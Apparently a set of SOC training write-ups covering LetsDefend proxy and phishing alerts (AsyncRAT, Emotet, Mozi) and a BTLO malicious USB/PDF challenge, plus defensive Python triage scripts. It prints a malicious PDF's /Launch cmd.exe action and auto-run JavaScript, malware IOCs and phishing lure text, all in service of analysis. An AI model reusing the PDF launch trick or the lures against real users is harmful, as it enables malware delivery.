LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 26
Details
EventID: 26
Event Time: Oct. 29, 2020, 7:05 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 217.8.117.77
Destination Hostname jamesrlongacre.ac.ug
Username Bill
Request URL http[:]//jamesrlongacre.ac[.]ug/ac.exe
User Agent: Firewall Test - Dont Block
Device Action Blocked
playbook
Analyze URL Address
First, investigate the IP.
217.8.117.77
VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/217.8.117.77
URLhaus: https://urlhaus.abuse.ch/browse.php?search=217.8.117.77
ip-sc: https://ip-sc.net/ja/r/217.8.117.77
VT has only a few detections, but URLhaus reports associations with a range of malware families (AsyncRAT, ArkeiStealer, AZORult, RaccoonStealer and others), so it is reasonable to judge the IP Malicious.
ip-sc rates the threat level as low; it is a Russian IP.
http[:]//jamesrlongacre.ac[.]ug/ac.exe
VirusTotal 10/93: https://www.virustotal.com/gui/url/3114ff42180d969ca55e5b84e12ec4119bf402e520f5ad4f27eec137d1a8ec4f
URLhaus: https://urlhaus.abuse.ch/url/748266/
Searching the URL on VT gives more detections, and it is confirmed in URLhaus as well. It appears to be an AsyncRAT download.
AsyncRAT (Malware Family)
The VT report on the downloaded file shows that it has been distributed repeatedly from this same IP.
VirusTotal: ac.exe
User Agent: Firewall Test - Dont Block <- ???
At this point it is safe to say that the blocked URL is Malicious.
What stands out, though, is the User Agent. It is conceivable that this was part of some security-testing work, but the destination is clearly suspicious. A phrase like "Dont Block" is not something any real browser sends; it is exactly the kind of string an attacker sets in the hope that a lax allow-list rule on the proxy or firewall matches it.
Also, 29 minutes later another alert, analyzed in the following write-up, was detected from the same host:
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28 - 4ensiX
The relation between the two alerts is unknown, but this looks like an attack disguised as a test.
Answer:Malicious
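The reasoning above (same host, same spoofed "test" User-Agent, two blocked payload downloads 29 minutes apart) can be turned into a small correlation check. The following is an added example and not part of the original write-up; the LOG entries are constructed from the two alerts on this page (event 26 and event 28 from BillPRD / 172.16.17.47) plus one hypothetical benign entry, and the field names are a simplified hypothetical schema, not LetsDefend's export format.

```python
"""Added example: correlate blocked proxy requests per host and flag a
User-Agent that pleads for an allow-list exception.

LOG is constructed from the two alerts in this write-up (event 26 and event
28) plus one hypothetical benign entry from another host. The field layout is
a simplified hypothetical schema, not the real LetsDefend export format.
"""
from datetime import datetime, timedelta

LOG = [
    {"time": "2020-10-29 19:05", "src": "172.16.17.47", "host": "BillPRD", "user": "Bill",
     "url": "http://jamesrlongacre.ac.ug/ac.exe", "ua": "Firewall Test - Dont Block",
     "action": "Blocked", "process": "chrome.exe"},
    {"time": "2020-10-29 19:10", "src": "172.16.17.50", "host": "HRPC01", "user": "alice",
     "url": "https://www.example.com/", "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
     "action": "Allowed", "process": "chrome.exe"},  # constructed benign entry
    {"time": "2020-10-29 19:34", "src": "172.16.17.47", "host": "BillPRD", "user": "Bill",
     "url": "http://115.99.150.132:56841/Mozi.m", "ua": "Firewall Test - Dont Block",
     "action": "Blocked", "process": "chrome.exe"},
]

# Phrases that only make sense as a plea to an allow-list rule. No browser,
# updater or legitimate scanner sends them, so they are a signal on their own.
ALLOWLIST_BAIT = ("firewall test", "dont block", "do not block", "whitelist")
BROWSERS = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe"}


def parse_time(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


def spoofed_test_ua(entry: dict) -> bool:
    """True when the UA pleads for an exception AND the request came out of a
    real browser process. A genuine test tool would not run inside chrome.exe,
    so the UA string was set by whatever the attacker controls."""
    ua = entry["ua"].lower()
    return any(b in ua for b in ALLOWLIST_BAIT) and entry["process"].lower() in BROWSERS


def correlate_blocked(entries: list, window: timedelta = timedelta(hours=1)) -> list:
    """Group Blocked requests per source host and return one finding per host:
    how many blocks, the span between first and last, whether that span fits
    inside `window` (a burst), and whether any request used a spoofed test UA."""
    by_host: dict = {}
    for e in sorted(entries, key=lambda e: parse_time(e["time"])):
        if e["action"] != "Blocked":
            continue
        by_host.setdefault(e["host"], []).append(e)

    findings = []
    for host, evs in by_host.items():
        first, last = parse_time(evs[0]["time"]), parse_time(evs[-1]["time"])
        span = last - first
        findings.append({
            "host": host,
            "src": evs[0]["src"],
            "blocked": len(evs),
            "span_minutes": int(span.total_seconds() // 60),
            "burst": len(evs) > 1 and span <= window,
            "spoofed_ua": any(spoofed_test_ua(e) for e in evs),
            "urls": [e["url"] for e in evs],
        })
    return findings


if __name__ == "__main__":
    for finding in correlate_blocked(LOG):
        print(finding)
```

Run against the constructed log, only BillPRD is reported: two blocks 29 minutes apart, inside the one-hour window, with the spoofed UA set on both. The point of the `process` check is that the UA claim and the originating process contradict each other; that contradiction is a stronger indicator than either field alone, and is what makes the "this was just a test" explanation hard to accept.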
Has Anyone Accessed IP/URL/Domain?
Device Action Blocked
Checked the log as well; the request was blocked.
DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|
Oct, 29, 2020, 07:05 PM | Proxy | 172.16.17.47 | 39485 | 217.8.117.77 | 443 |
```
Request URL: http://jamesrlongacre.ac.ug/ac.exe
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
```
Answer:Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
http[:]//jamesrlongacre.ac[.]ug/ac.exe | URL Address | AsyncRAT distribution server (217.8.117.77) |
217.8.117.77 | IP Address | Distribution server for multiple malware families |
True Positive
End
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 27
Details
EventID: 27
Event Time: Oct. 29, 2020, 7:25 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 146.56.209.252
Source Address ndt@zol.co.zw
Destination Address susie@letsdefend.io
E-mail Subject UPS Your Packages Status Has Changed
Device Action Blocked
playbook
Are there attachments or URLs in the email?
Answer:Yes
Analyze Url/Attachment
Sender IP 146.56.209.252
VirusTotal: https://www.virustotal.com/gui/ip-address/146.56.209.252/detection
AbuseIPDB: https://www.abuseipdb.com/check/146.56.209.252
ip-sc: https://ip-sc.net/ja/r/146.56.209.252
The IP is in China (Shenzhen Tencent). It has been used as a source of SSH brute-force attacks.
Sender Domain zol.co[.]zw
Hybrid-Analysis: https://www.hybrid-analysis.com/search?query=zol.co.zw
The domain is suspicious.
```
Subject: UPS Your Packages Status Has Changed
From: ndt@zol.co.zw  Oct. 29, 2020, 7:25 p.m.
To: susie@letsdefend.io  Oct. 29, 2020, 7:25 p.m.

You have received a secure message from a Veterans United Employee.
Click below link by 2020-11-14 14:30 CDT to read your message. After that, open attachment.
https://hredoybangladesh.com/content/docs/wvoiha4vd1aqty/
```
URL link: https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/
VirusTotal: https://www.virustotal.com/gui/url/2825a389272fd0e4b9923c98644a1786d4019ec7002c0a718b59dbe6d713a889
URLhaus: https://urlhaus.abuse.ch/url/698975/
The page can no longer be viewed, so its current content is unknown, but the VT report classifies it as a malware download URL, and URLhaus reports an association with Emotet/Heodo.
The most recent file associated with this link in the URLhaus report is:
VirusTotal: https://www.virustotal.com/gui/file/360a5cb7eed923017b4ef07460e7652362cdf1fc0a902516addbb8e244e30134/detection/f-360a5cb
Searching ANY.RUN for the same hash:
ANYRUN: https://app.any.run/tasks/989ac1f3-9d9e-4854-80c1-f65b1b8cd1a2/
The macro runs PowerShell, which executes what it downloaded; the payload then contacts the C2 server and sets up autostart persistence, among other things.
hredoybangladesh[.]com
The domain itself is also flagged by several vendors.
VirusTotal: https://www.virustotal.com/gui/domain/hredoybangladesh.com/detection
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer: Not Delivered
Add Artifacts
Value | Type | Comment |
---|---|---|
ndt@zol.co.zw | E-mail Sender | 146.56.209.252 |
https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/ | URL Address | download link (Emotet/Heodo) |
End
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28
Details
EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http[:]//115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked
playbook
Analyze Threat Intel Data
http[:]//115.99.150.132:56841/Mozi.m
VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
On VT the URL is flagged Malicious by well-known vendors, so it is suspicious.
Since it is listed in URLhaus, the URL is definitely malware-related.
Download file Mozi.m
- b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605
VirusTotal 42/61: https://www.virustotal.com/gui/file/b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605/detection/f-b5cf68c
The actual file could not be obtained, so its contents are unknown, but it appears to be an ELF file, and VT also rates it Malicious. Mozi is an IoT botnet distributed as per-architecture ELF builds (the .m suffix is commonly the MIPS build), so a Windows workstation fetching it through chrome.exe is itself odd and fits the "attack disguised as a test" pattern seen in event 26.
Answer: Malicious
Interaction with TI data
Log search
DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|
Oct, 29, 2020, 07:34 PM | Proxy | 172.16.17.47 | 46938 | 115.99.150.132 | 56841 |
Request URL: http://115.99.150.132:56841/Mozi.m Request Method: GET Device Action: Blocked Process: chrome.exe Parent Process: explorer.exe Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
The access was blocked.
No clues were found on the endpoint.
Answer: Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
http[:]//115.99.150.132:56841/Mozi.m | URL Address | malware download |
a73ddd6ec22462db955439f665cad4e6 | MD5 Hash | Mozi.m - ELF malware? |
End
The older alerts are not very interesting.
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 29
Details
EventID: 29
Event Time: Oct. 29, 2020, 7:43 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 191.233.193.73
Source Address icianb@hotmail.com
Destination Address sofia@letsdefend.io
E-mail Subject Invoice
Device Action Blocked
playbook
Are there attachments or URLs in the email?
```
Subject: Invoice
From: icianb@hotmail.com  Oct. 29, 2020, 7:43 p.m.
To: sofia@letsdefend.io  Oct. 29, 2020, 7:43 p.m.

Hello,
Attached copy of your unpaid invoice & Statement
Our Statement shows 2 invoices are paid.
Our AP did confirmed payment was paid on the 13th of October into your Bank account.
Thank you.

Attachments: 4abd5dd8377e5810116f3665bd8d92f0.zip
```
Answer:Yes
Analyze Url/Attachment
The sender is a hotmail address, so not much can be said about it. This time the problem seems to be in the attachment. The executable extracted from it hashes as follows:
```
$ sha256sum 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe
43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa  43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe
```
VirusTotal 35/68: https://www.virustotal.com/gui/file/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/detection
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/5f9d102805f963128371eff5
For now, Malicious is a safe call. The network-device lookups it performs are suspicious as well, and there is a report on VT describing it as an APT Scanner.
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer:Not Delivered
Add Artifacts
Value | Type | Comment |
---|---|---|
icianb@hotmail.com | E-mail Sender | 191.233.193.73 |
4abd5dd8377e5810116f3665bd8d92f0 | MD5 Hash | APT Scanner? Malicious by VT |
End
BTLO Challenge Suspicious USB Stick(Retired Challenge) write up
BTLO Challenge Suspicious USB Stick(Retired Challenge)
- Scenario
- Challenge Submission
- 1. What file is the autorun.inf running? (3 points)
- 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
- 3. Does the file have the correct magic number? (2 points)
- 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
- 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
- 6. How many suspicious /OpenAction elements does the file have? (5 points)
Scenario
One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?
Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool
Challenge Submission
1. What file is the autorun.inf running? (3 points)
Format: filename.extension
```
$ cat autorun.inf
[autorun]
open=README.pdf
icon=autorun.ico
```
Answer: README.pdf
2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
True or False
SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
VirusTotal 38/59: https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
Answer: False
3. Does the file have the correct magic number? (2 points)
True or False
```
$ file README.pdf
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|
```
The file starts with the bytes 25 50 44 46 2d (`%PDF-`), the correct PDF signature.
Answer: True
4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
Operating System
```
$ pdfinfo README.pdf
Creator:         StarMan
CreationDate:    Thu Feb 11 02:54:49 2021 EST
ModDate:         Thu Feb 11 02:54:49 2021 EST
Tagged:          yes
UserProperties:  no
Suspects:        no
Form:            none
Syntax Warning: Bad launch-type link action
JavaScript:      no
Pages:           1
Encrypted:       no
Page size:       612 x 792 pts (letter)
Page rot:        0
File size:       136561 bytes
Optimized:       no
PDF version:     1.7
```
```
$ pdfid README.pdf
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
```
```
$ pdf-parser -a README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
```
Now check /JS, /JavaScript, /OpenAction and /Launch:
```
$ pdf-parser -o 27 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing:

  << /S /JavaScript /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });) /Type /Action >>
```
```
$ pdf-parser -o 1 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  << /Type /Catalog /Pages 2 0 R /Lang (en-US) /StructTreeRoot 10 0 R /MarkInfo << /Marked true >> /Metadata 20 0 R /ViewerPreferences 21 0 R >>

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  << /Type /Catalog /Pages 2 0 R /Names 23 0 R /OpenAction 27 0 R /Lang (en-US) /StructTreeRoot 10 0 R /MarkInfo << /Marked true >> /Metadata 20 0 R /ViewerPreferences 21 0 R >>
```
obj 1 appears twice because the file has been incrementally updated (four xref/trailer sections): the original catalog has no /OpenAction, and a later revision adds /Names 23 0 R and /OpenAction 27 0 R. That is where the JavaScript gets wired in.
```
$ pdf-parser -o 28 README.pdf
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing:

  << /S /Launch /Type /Action /Win << /F (cmd.exe) /D '(c:\\\\windows\\\\system32)' /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)' >> >>
```
The /Launch action is Windows-specific (/Win, cmd.exe, %HOMEDRIVE%, %HOMEPATH%). The run of newlines followed by the friendly "To view the encrypted content..." text sits inside the /P parameter so that the reader's launch-warning dialog shows the social-engineering text and pushes the actual command line out of view. Note also that pdf-parser shows /AA on obj 3 (the page), which is the other automatic trigger worth checking alongside /OpenAction.
Answer: windows
5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
Format: filename.exe
From the output of pdf-parser -o 28 README.pdf above, the /Launch action's /F entry:
Answer: cmd.exe
6. How many suspicious /OpenAction elements does the file have? (5 points)
From the pdfid output (/OpenAction 1) and the /OpenAction 27 0 R entry in obj 1,
which points at the suspicious JavaScript action (obj 27).
Answer: 1
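The checks above (magic number, pdfid keyword counts, following /OpenAction to its action object, and reading the /Launch command line) can be reproduced with a short script. The following is an added example and not part of the original write-up or of the pdfid/pdf-parser tools; SAMPLE is a constructed, uncompressed fragment that only mirrors the object layout seen in README.pdf (obj 1 catalog, obj 27 JavaScript action, obj 28 Launch action) and is not the real file or a complete valid PDF.

```python
"""Added example: minimal PDF triage reproducing the pdfid / pdf-parser checks.

1. verify the %PDF- magic number,
2. count the risky names pdfid reports (whole-token, like pdfid),
3. follow the catalog's /OpenAction to the action object it fires on open,
4. list every /Launch action with the program and parameters it would run.

SAMPLE is a constructed fragment mirroring README.pdf's object layout; it is
not the real file. Objects packed inside /ObjStm streams would need inflating
first (pdf-parser does that; this script deliberately does not).
"""
import re

SAMPLE = b"""%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /Names 23 0 R /OpenAction 27 0 R /Lang (en-US) >>
endobj
27 0 obj
<< /S /JavaScript /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });) /Type /Action >>
endobj
28 0 obj
<< /S /Launch /Type /Action /Win << /F (cmd.exe) /D (c:\\\\windows\\\\system32) /P (/Q /C start README.pdf) >> >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

RISKY = ("/OpenAction", "/AA", "/Launch", "/JS", "/JavaScript", "/EmbeddedFile")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
OPENACTION_RE = re.compile(rb"/OpenAction\s+(\d+)\s+\d+\s+R")


def has_pdf_magic(data: bytes) -> bool:
    """A genuine PDF begins with the signature %PDF- (25 50 44 46 2d)."""
    return data.startswith(b"%PDF-")


def count_keywords(data: bytes) -> dict:
    """Count each risky name as a whole token so /JS is not also counted
    inside /JavaScript (and vice versa), matching pdfid's behaviour."""
    return {kw: len(re.findall(re.escape(kw.encode()) + rb"(?![A-Za-z0-9])", data))
            for kw in RISKY}


def parse_objects(data: bytes) -> dict:
    """Map object number -> body text for every uncompressed indirect object."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(data)}


def pdf_string(body: bytes, key: bytes):
    """Return the literal string value of `key` ( ... ), honouring nested
    parentheses and backslash escapes as the PDF spec requires, else None."""
    m = re.search(re.escape(key) + rb"\s*\(", body)
    if not m:
        return None
    i, depth, out = m.end(), 1, bytearray()
    while i < len(body):
        c = body[i:i + 1]
        if c == b"\\":            # escape sequence: keep both bytes verbatim
            out += body[i:i + 2]
            i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                break
        out += c
        i += 1
    return bytes(out)


def triage(data: bytes) -> dict:
    objs = parse_objects(data)
    report = {"magic_ok": has_pdf_magic(data), "keywords": count_keywords(data),
              "open_action": None, "launch": []}
    # The catalog is the document root; its /OpenAction fires when the file opens.
    for body in objs.values():
        if re.search(rb"/Type\s*/Catalog", body) and (m := OPENACTION_RE.search(body)):
            target = int(m.group(1))
            tbody = objs.get(target, b"")
            sub = re.search(rb"/S\s*/(\w+)", tbody)
            report["open_action"] = {"obj": target,
                                     "subtype": sub.group(1).decode() if sub else None,
                                     "js": pdf_string(tbody, b"/JS")}
    # /Launch may hang off /OpenAction, a page /AA or a link: list every one.
    for num, body in objs.items():
        if re.search(rb"/S\s*/Launch\b", body):
            report["launch"].append({"obj": num, "file": pdf_string(body, b"/F"),
                                     "params": pdf_string(body, b"/P")})
    return report


if __name__ == "__main__":
    print(triage(SAMPLE))
```

On the constructed sample this reports the magic as valid, one each of /OpenAction, /Launch, /JS and /JavaScript, an /OpenAction that resolves to obj 27 (a JavaScript action calling exportDataObject), and a /Launch action in obj 28 that runs cmd.exe. The balanced-parenthesis string reader matters: a naive regex stops at the first `)` inside `exportDataObject(...)` and returns a truncated, misleading script.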